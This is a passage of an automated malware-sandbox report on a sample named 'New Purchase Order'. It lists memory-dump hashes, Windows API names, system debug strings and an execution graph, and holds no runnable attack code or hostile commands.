                • Opcode Fuzzy Hash: b8a4d680c67ee9e4357e743eda9a3d191f39cbbf1faab40fdbc875ffa58da3d7
                • Instruction Fuzzy Hash: 3E90023120181406D5017158481570B004597D1302F55C011E6178555DCA258A956672
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 647d8bd37a7c817aa7247e9c36bc2450dd6eb5ad0ab502c688614d51dadc4b98
                • Instruction ID: fdcdca2c39e05ca06bbf546ad167a1c05602ca3ecdbccd4c21556df75494c4b8
                • Opcode Fuzzy Hash: 647d8bd37a7c817aa7247e9c36bc2450dd6eb5ad0ab502c688614d51dadc4b98
                • Instruction Fuzzy Hash: 1B90023120181406D50171584809747004597D1302F55C011EA178555ECA65CAD56632
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 176feaf1d25c62d662d97d0db6070e55bc279f2cb09aefbae1c28300770f112c
                • Instruction ID: 759e33711e3df367780cf9474ebbcf2b491d37e92b9842ac0eedf854ce6f1669
                • Opcode Fuzzy Hash: 176feaf1d25c62d662d97d0db6070e55bc279f2cb09aefbae1c28300770f112c
                • Instruction Fuzzy Hash: 24900221601410464541716888459064045BBE2311755C121E59AC550DC9598AA95766
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1a1edaa1aeffab37fc1789eb442f384a1d1d208c07960e651d618cbabfdd27bb
                • Instruction ID: 8614b132e70a6243bdc4cf5812171f364d3e988628d5cb6e27cbefc664eedbda
                • Opcode Fuzzy Hash: 1a1edaa1aeffab37fc1789eb442f384a1d1d208c07960e651d618cbabfdd27bb
                • Instruction Fuzzy Hash: A7900221211C1046D60175684C15B07004597D1303F55C115E5168554CCD158AA55622
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d2d17d35e1868b077667bcbed9f9308f7975c6b7e4de0f7e0d6eec18d54dff5c
                • Instruction ID: 5700324175ab69474d0c10da38491c1bcccd53e156d4b02f542af856cf161805
                • Opcode Fuzzy Hash: d2d17d35e1868b077667bcbed9f9308f7975c6b7e4de0f7e0d6eec18d54dff5c
                • Instruction Fuzzy Hash: 6990026134141446D50171584415B060045D7E2301F55C015E6078554DCA19CE966227
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f453cf8ade48072803efe4366b2491584fa533fbb10d117123d620878b40b0a4
                • Instruction ID: 8ed9bf3dc91fd6663943fc9ebb2317b114dd5a3740c309ad2c0225faba20c56d
                • Opcode Fuzzy Hash: f453cf8ade48072803efe4366b2491584fa533fbb10d117123d620878b40b0a4
                • Instruction Fuzzy Hash: 2090026121141046D50571584405706008597E2301F55C012E7168554CC9298EA55226
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 342b3d850a5e30f70603d95a8a84ffc1171f3688748fb2a752784120649bf29f
                • Instruction ID: 65222a017326953917af94158765b43a8fda1cf4ac512d8310845f4d0d3867bd
                • Opcode Fuzzy Hash: 342b3d850a5e30f70603d95a8a84ffc1171f3688748fb2a752784120649bf29f
                • Instruction Fuzzy Hash: 8A90022160141506D50271584405616004A97D1341F95C022E6038555ECE258BD6A232
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc7f6e2a4e9320cb844035cd72347900077fb40d573ec0caf8406ebd44440bbc
                • Instruction ID: c51dc206bc289ea4f209eaffcade76dae3bcfbaa3498d411fd26e6855a7510de
                • Opcode Fuzzy Hash: fc7f6e2a4e9320cb844035cd72347900077fb40d573ec0caf8406ebd44440bbc
                • Instruction Fuzzy Hash: 7290027120141406D54171584405746004597D1301F55C011EA078554ECA598FD96766
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 520e3601b6916d723b4b88de85a800269f1b5b1355be2ce3e526910babe72da2
                • Instruction ID: 64a515b884a7f9f0855c79b5b8dee351980096653504fdccf60eac43770b6814
                • Opcode Fuzzy Hash: 520e3601b6916d723b4b88de85a800269f1b5b1355be2ce3e526910babe72da2
                • Instruction Fuzzy Hash: 9D90026120181407D54175584805607004597D1302F55C011E7078555ECE298E956236
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 569ee20a331bd790c95f7da12d605b8743e92b6a2c65cd409af253fdf0f16d76
                • Instruction ID: a6715fb30759c359b7a7db3f9414e2e272970355bf68ee7a7152dd542d324e89
                • Opcode Fuzzy Hash: 569ee20a331bd790c95f7da12d605b8743e92b6a2c65cd409af253fdf0f16d76
                • Instruction Fuzzy Hash: 9390022130141406D503715844156060049D7D2345F95C012E6438555DCA258B97A233
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 239705dd7af3ab68df78c6d2e5f28048c8b0fba86895afb148b51a2e76d55b05
                • Instruction ID: 0214d1af6c8680543e1a57658f4cc2728965256b61e7002fedb4628d04e8ff33
                • Opcode Fuzzy Hash: 239705dd7af3ab68df78c6d2e5f28048c8b0fba86895afb148b51a2e76d55b05
                • Instruction Fuzzy Hash: 0E90022124141806D541715884157070046D7D1701F55C011E5038554DCA168BA967B2
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: af4fe0a41535251c33f00e8d30e960af0e854e8ddaa160ec43d369e0c35f5608
                • Instruction ID: ccb7e47dc973f41b644dd80a9666900fade5e321a3b27c7c78ed59092942c323
                • Opcode Fuzzy Hash: af4fe0a41535251c33f00e8d30e960af0e854e8ddaa160ec43d369e0c35f5608
                • Instruction Fuzzy Hash: B590022120185446D54172584805B0F414597E2302F95C019E916A554CCD158A995722
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc182a37bb4a1e11e56f431408a46aa9f08cf1d24b0bff99b02e7f5ea6d2ba9b
                • Instruction ID: 0b2319c721bc8453001c9681bfea233ea5ac0b1a5370630f267a0a2d2343300e
                • Opcode Fuzzy Hash: fc182a37bb4a1e11e56f431408a46aa9f08cf1d24b0bff99b02e7f5ea6d2ba9b
                • Instruction Fuzzy Hash: D190022124546106D551715C44056164045B7E1301F55C021E5828594DC9558A996322
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 364995cc996b41159ad0a24c2c641c627d62488233a7b6b1046cb17f4c14d9fe
                • Instruction ID: 007036170b5f4500f4a86b8abe93d303b387bb9975a1570fc028feaa823722a0
                • Opcode Fuzzy Hash: 364995cc996b41159ad0a24c2c641c627d62488233a7b6b1046cb17f4c14d9fe
                • Instruction Fuzzy Hash: 6190023120241146994172585805A4E414597E2302B95D415E5029554CCD148AA55322
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: abcb62053508fb1891e17316fe1755a6cd4881f1aabddc343597d772deab89ac
                • Instruction ID: 04ff5ff1d6101d814bfd865b75ab7482b988c68599376503f2cce817d712c1b0
                • Opcode Fuzzy Hash: abcb62053508fb1891e17316fe1755a6cd4881f1aabddc343597d772deab89ac
                • Instruction Fuzzy Hash: 9590023520141406D91171585805646008697D1301F55D411E5438558DCA548AE5A222
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction ID: 5c50d62c8420c679e74bc3c3473ab3f4413ab18957b0b7cf1e19b8694fb772fd
                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction Fuzzy Hash:
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: ee8b19aced4bd19a4ec72388f384d0a1d008057c1da42dba180687bf853e1568
                • Instruction ID: 96a30afb2279e16baf28d643eaa6eb0053075ceb8dddcc606288796155f83914
                • Opcode Fuzzy Hash: ee8b19aced4bd19a4ec72388f384d0a1d008057c1da42dba180687bf853e1568
                • Instruction Fuzzy Hash: 4A51F6B2A0011ABFDB11DBAC899097EFBBDBB483407608229F4A5D7645D734DF4087E0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: b70f5493bb1c3b3ca3542e0c5ba9a7ca817533433cd12a247ef44c8ed8d3d72e
                • Instruction ID: 4d51e301cf5f431a4085dedf14ff1180aa6c557132e50d539c6309c388d1a702
                • Opcode Fuzzy Hash: b70f5493bb1c3b3ca3542e0c5ba9a7ca817533433cd12a247ef44c8ed8d3d72e
                • Instruction Fuzzy Hash: C651F1B5A40646AACB30EE9CC99087FFBFAAF44300B44846DF496D3642E674EB40C770
                Strings
                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01844742
                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01844655
                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01844725
                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018446FC
                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01844787
                • ExecuteOptions, xrefs: 018446A0
                • Execute=1, xrefs: 01844713
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                • API String ID: 0-484625025
                • Opcode ID: ebb7944b7fcebc284e94316082138612a44034b48dccdcf29f6fd619895b59e3
                • Instruction ID: 74289f425b6418d8be41dac9285a9a8398f811a55d6a5c9898360217955806e2
                • Opcode Fuzzy Hash: ebb7944b7fcebc284e94316082138612a44034b48dccdcf29f6fd619895b59e3
                • Instruction Fuzzy Hash: 1D51197160021DAAEF62EAA8DC95BB977A8EF14344F1400A9E606E71C1EB70AB458F51
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction ID: 42a62f0f8c53f7d8bda98900ab731fc1f43c68f578abc89cb326012205b67b4d
                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction Fuzzy Hash: C2021871508342AFE305CF18C490A6BBBE5FFC4714F648A2DFA9587258EB71EA05CB52
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction ID: 85cecca8b308c48b45c1cf395c914ab586026284699d9b2b98a79a262f643a8d
                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction Fuzzy Hash: D081E372E052498FEF258F6CC8517FEBBB9AF54760F184919E851E7299C7308A40CB61
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$[$]:%u
                • API String ID: 48624451-2819853543
                • Opcode ID: 7843487436741cc4d9c6c8fab32fccf7433ad8d76a73c0524ec3d1da09fb07ef
                • Instruction ID: 33c38526ee9265dfe10424da57a061e01d01804813582f817285b848e3c50869
                • Opcode Fuzzy Hash: 7843487436741cc4d9c6c8fab32fccf7433ad8d76a73c0524ec3d1da09fb07ef
                • Instruction Fuzzy Hash: 182151BAA00519ABDB11EF7DC840AAEBBE9EF54744F54011AE905E3204E730EB11CBA1
                Strings
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018402BD
                • RTL: Re-Waiting, xrefs: 0184031E
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018402E7
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                • API String ID: 0-2474120054
                • Opcode ID: 24566e7d1c5dd4416ae393b8e9300915fd89bddd8e3822d23dbd8f909b9fee8f
                • Instruction ID: d0138a0c60c462586f2754cbd83f003971552e3aef632858dbfbc3af8f22222b
                • Opcode Fuzzy Hash: 24566e7d1c5dd4416ae393b8e9300915fd89bddd8e3822d23dbd8f909b9fee8f
                • Instruction Fuzzy Hash: 97E1AA326087459FD725CF28C884B6BBBE0AB88714F140A5DF6A5CB3E1DB74DA44CB52
                Strings
                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01847B7F
                • RTL: Re-Waiting, xrefs: 01847BAC
                • RTL: Resource at %p, xrefs: 01847B8E
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 0-871070163
                • Opcode ID: eaa6095cce8d35c821583fec88b052c6fde1faa14981f67a4d76a157eb4d6afa
                • Instruction ID: f8eb3268073753a88c83e6c109dae21b6e48363a430e10f1477d2f4160b27a55
                • Opcode Fuzzy Hash: eaa6095cce8d35c821583fec88b052c6fde1faa14981f67a4d76a157eb4d6afa
                • Instruction Fuzzy Hash: B941263530170A8FD726DE29CC40B6AB7E5EF88710F100A1DFA56D7280DB31EA058B92
                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0184728C
                Strings
                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01847294
                • RTL: Re-Waiting, xrefs: 018472C1
                • RTL: Resource at %p, xrefs: 018472A3
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 885266447-605551621
                • Opcode ID: da1e8683500f4b8e552b25174d4699b8d0e9a6409287b4555120c5ca69d7bc80
                • Instruction ID: 5ad9ec352261f7957b9e8bfe31103b7ddfaf6803214728911d6b02200fa8f19a
                • Opcode Fuzzy Hash: da1e8683500f4b8e552b25174d4699b8d0e9a6409287b4555120c5ca69d7bc80
                • Instruction Fuzzy Hash: 9041227570061AABC721CE29CC81B66B7A5FB94714F100619F956EB280DB31EA4287D2
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$]:%u
                • API String ID: 48624451-3050659472
                • Opcode ID: 56263039b4f1cef36665780a51a29875762760900755e0233688be340a777660
                • Instruction ID: dd5b80cc0211d80568b7e559f871a180add6955aa70751cd6103ec3b9cca9cba
                • Opcode Fuzzy Hash: 56263039b4f1cef36665780a51a29875762760900755e0233688be340a777660
                • Instruction Fuzzy Hash: 4C317376A002199EDB20DE2DCC50BAEB7F9AF44710F84455AE949E3200EB30AB44CBA1
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction ID: e3732f5f58d65c20e8a1baa20bd1bc0f58955fbe311d0d13f036fcd12286329a
                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction Fuzzy Hash: 2F91A173E0020A9AEB24DF6DC881ABFBBA9AF45720F64451EE955E72C8D7309B408751
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: $$@
                • API String ID: 0-1194432280
                • Opcode ID: c54bc7c70051c2b7fd6d4a6ca20a259aac4891217d319860771d2b4169ca7bf0
                • Instruction ID: 8b0973c9e3fb7a8c421c9a124d811706ba930401231ee9ef54327a80ae95c6a6
                • Opcode Fuzzy Hash: c54bc7c70051c2b7fd6d4a6ca20a259aac4891217d319860771d2b4169ca7bf0
                • Instruction Fuzzy Hash: 90810C71D002699BDB31CB54CC45BEAB7B9AF48714F0441EAEA19B7280E7705F84DFA0
                APIs
                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0185CFBD
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: CallFilterFunc@8
                • String ID: @$@4Cw@4Cw
                • API String ID: 4062629308-3101775584
                • Opcode ID: 5e77ff5f238a0284bf5a5e6e1f15e8f1cfe9985b154a2b73ca6fd60ce478fe2a
                • Instruction ID: b67d58bfea3b3cdf68ce8a4a5cacc7f1daab169fdd5d8d19525f79af9931085f
                • Opcode Fuzzy Hash: 5e77ff5f238a0284bf5a5e6e1f15e8f1cfe9985b154a2b73ca6fd60ce478fe2a
                • Instruction Fuzzy Hash: AB41CD75900219DFCB219FA9C884AAEFBF8FF58B10F10412AEE11DB254E774CA01CB61

                Execution Graph

                Execution Coverage:9.8%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:76
                Total number of Limit Nodes:12
                execution_graph 27855 af10040 27856 af101cb 27855->27856 27857 af10066 27855->27857 27857->27856 27860 af102c0 PostMessageW 27857->27860 27862 af102b8 27857->27862 27861 af1032c 27860->27861 27861->27857 27863 af102c0 PostMessageW 27862->27863 27864 af1032c 27863->27864 27864->27857 27777 185d540 27778 185d586 GetCurrentProcess 27777->27778 27780 185d5d1 27778->27780 27781 185d5d8 GetCurrentThread 27778->27781 27780->27781 27782 185d615 GetCurrentProcess 27781->27782 27783 185d60e 27781->27783 27784 185d64b 27782->27784 27783->27782 27785 185d673 GetCurrentThreadId 27784->27785 27786 185d6a4 27785->27786 27865 185b1b0 27866 185b1bf 27865->27866 27868 185b299 27865->27868 27869 185b2dc 27868->27869 27870 185b2b9 27868->27870 27869->27866 27870->27869 27871 185b4e0 GetModuleHandleW 27870->27871 27872 185b50d 27871->27872 27872->27866 27787 58e4688 27788 58e469f 27787->27788 27791 58e4178 27788->27791 27792 58e4183 27791->27792 27798 58e43e0 27792->27798 27794 58e4a42 27802 58e7027 27794->27802 27808 58e7038 27794->27808 27795 58e472a 27799 58e43eb 27798->27799 27800 58e4b84 27799->27800 27814 58e2ac0 GetSystemMetrics GetSystemMetrics 27799->27814 27800->27794 27803 58e7058 27802->27803 27804 58e70c7 27802->27804 27805 58e708c 27803->27805 27815 58e7138 27803->27815 27821 58e7148 27803->27821 27804->27795 27805->27795 27810 58e7058 27808->27810 27811 58e70c7 27808->27811 27809 58e708c 27809->27795 27810->27809 27812 58e7138 GetCurrentThreadId 27810->27812 27813 58e7148 GetCurrentThreadId 27810->27813 27811->27795 27812->27810 27813->27810 27814->27800 27816 58e7148 27815->27816 27820 58e716c 27816->27820 27828 58e584c 27816->27828 27819 58e584c GetCurrentThreadId 27819->27820 27820->27803 27822 58e716c 27821->27822 27823 58e7173 27821->27823 27822->27803 27824 58e584c GetCurrentThreadId 27823->27824 27827 58e719a 27823->27827 27825 58e7190 27824->27825 27826 58e584c GetCurrentThreadId 27825->27826 27826->27827 27827->27803 27829 58e5857 27828->27829 
27830 58e74af GetCurrentThreadId 27829->27830 27831 58e7190 27829->27831 27830->27831 27831->27819 27832 185d788 DuplicateHandle 27833 185d81e 27832->27833 27834 1854668 27835 1854669 27834->27835 27836 1854686 27835->27836 27838 1854778 27835->27838 27839 185479d 27838->27839 27843 1854879 27839->27843 27847 1854888 27839->27847 27844 18548af 27843->27844 27845 185498c 27844->27845 27851 18544e0 27844->27851 27848 18548af 27847->27848 27849 18544e0 CreateActCtxA 27848->27849 27850 185498c 27848->27850 27849->27850 27852 1855918 CreateActCtxA 27851->27852 27854 18559db 27852->27854

                Control-flow Graph

                APIs
                • GetCurrentProcess.KERNEL32 ref: 0185D5BE
                • GetCurrentThread.KERNEL32 ref: 0185D5FB
                • GetCurrentProcess.KERNEL32 ref: 0185D638
                • GetCurrentThreadId.KERNEL32 ref: 0185D691
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: d298d3c493fdf751a91867940a9409122cc84f3f9c3e7ebc134d1101af76ff21
                • Instruction ID: a5e7a1d7e740e9590b9cf45ac9fbe39e8f408d71d9410664465b9e078de32e28
                • Opcode Fuzzy Hash: d298d3c493fdf751a91867940a9409122cc84f3f9c3e7ebc134d1101af76ff21
                • Instruction Fuzzy Hash: AB5188B09003498FDB54DFA9C548BDEBFF1FF88314F24845AE909AB2A0DB746944CB65

                Control-flow Graph

                APIs
                • GetCurrentProcess.KERNEL32 ref: 0185D5BE
                • GetCurrentThread.KERNEL32 ref: 0185D5FB
                • GetCurrentProcess.KERNEL32 ref: 0185D638
                • GetCurrentThreadId.KERNEL32 ref: 0185D691
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 89115e32bdefff963d99f4e7d91292b0cfed5d6cf2c5cc1614791928e56921eb
                • Instruction ID: d056e909a671e6c6fbc20a1009ffb18cb0068ac67a59dd1e10bde5468f186959
                • Opcode Fuzzy Hash: 89115e32bdefff963d99f4e7d91292b0cfed5d6cf2c5cc1614791928e56921eb
                • Instruction Fuzzy Hash: E25155B09003498FDB44DFA9C548B9EBFF1EF88314F208459E909A72A0DB74A945CB65

                Control-flow Graph

                • Executed
                • Not Executed
